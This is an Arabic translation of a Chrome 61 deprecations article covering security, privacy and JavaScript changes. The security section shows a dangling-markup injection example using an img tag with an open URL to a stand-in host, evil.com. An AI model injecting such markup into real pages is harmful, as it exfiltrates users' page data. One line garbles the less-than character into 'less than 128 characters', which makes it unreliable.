في كل إصدار من Chrome تقريبًا، نلاحظ عددًا كبيرًا من التحديثات والتحسينات على المنتج وأدائه وإمكانات Web Platform. توضّح هذه المقالة الميزات التي سيتم إيقافها نهائيًا أو إزالتها في الإصدار 61 من Chrome، الذي أصبح متاحًا في إصدار تجريبي اعتبارًا من 3 آب (أغسطس). تخضع هذه القائمة للتغيير في أي وقت.
الأمان والخصوصية
حظر الموارد التي تحتوي عناوين URL الخاصة بها على حرفَي "\n" و"<"
هناك نوع من الاختراق يُعرف باسم إدخال علامات ترميز غير مكتملة، ويتم فيه استخدام عنوان URL
مقتطع لإرسال البيانات إلى نقطة نهاية خارجية. على سبيل المثال،
لنفترض أنّ الصفحة تحتوي على <img src='https://evil.com/?. وبما أنّ عنوان URL لا يحتوي على علامة اقتباس
مغلقة، ستقرأ المتصفّحات العلامة التالية التي تظهر وتتعامل مع
الأحرف المضمّنة كما لو كانت عنوان URL واحدًا.
يحدّ الإصدار 61 من Chrome من هذه الثغرة الأمنية من خلال تقييد مجموعات الأحرف
المسموحة في سمتَي href وsrc. على وجه التحديد، سيتوقف Chrome عن
معالجة عناوين URL عند العثور على أحرف سطر جديد (\n) وأقل من
أحرف (<).
على المطوّرين الذين لديهم حالة استخدام مشروعية لسطر جديد وأقل من 128 حرفًا في عنوان URL ترميز هذه الأحرف بدلاً من ذلك.
Intent to Remove | Chromestatus Tracker | Chromium Bug
إيقاف Presentation API نهائيًا وإزالتها من السياقات غير الآمنة
تبيّن أنّه يمكن استخدام Presentation API كأحد وسائل هكّر التطبيقات التي تستند إلى مصادر غير آمنة. بما أنّ الشاشات لا تحتوي على أشرطة عناوين، يمكن استخدام واجهة برمجة التطبيقات لخداع المحتوى. من الممكن أيضًا استخراج البيانات من العرض التقديمي الجاري.
بما يتوافق مع نية Blink في إزالة الميزات القوية من المصادر غير الآمنة، نخطّط لإيقاف Presentation API نهائيًا و
إزالة إمكانية استخدامها في السياقات غير الآمنة. بدءًا من الإصدار 61 من Chrome، لن تعمل PresentationRequest.start() على مصادر غير آمنة.
Intent to Remove | Chromestatus Tracker | Chromium Bug
JavaScript
عدم السماح بتحديد المواقع المفهرَسة على النوافذ
في السابق، كانت بعض المتصفّحات تسمح بعمليات تعيين JavaScript مثل ما يلي:
window[0] = 1;
تشير ملاحظات مواصفات HTML الحالية إلى أنّ هذا الإجراء يشكّل انتهاكًا صريحًا لمواصفات JavaScript. ولهذا السبب، تمت إزالة هذه الميزة في الإصدار 61 من Chrome. اعتبارًا من شباط (فبراير) 2016، أصبح متصفّح Firefox متوافقًا.
إزالة استخدام الإشعارات من إطارات iframe غير الآمنة
يمكن أن تؤدي طلبات الأذونات الواردة من إطارات iframe إلى إرباك المستخدمين لأنّه من الصعب التمييز بين مصدر الصفحة التي تتضمّن الإطار ومصادر إطار iframe الذي يقدّم الطلب. عندما يكون نطاق الطلبات غير واضح، يصعب على المستخدمين الحكم على ما إذا كانوا يريدون منح الإذن أو رفضه.
سيؤدي حظر الإشعارات في إطارات iframe أيضًا إلى مواءمة متطلبات إذن الإشعارات مع متطلبات الإشعارات الفورية، ما يسهّل على المطوّرين استخدامها.
يمكن للمطوّرين الذين يحتاجون إلى هذه الوظيفة فتح نافذة جديدة لطلب إذن إرسال الإشعارات.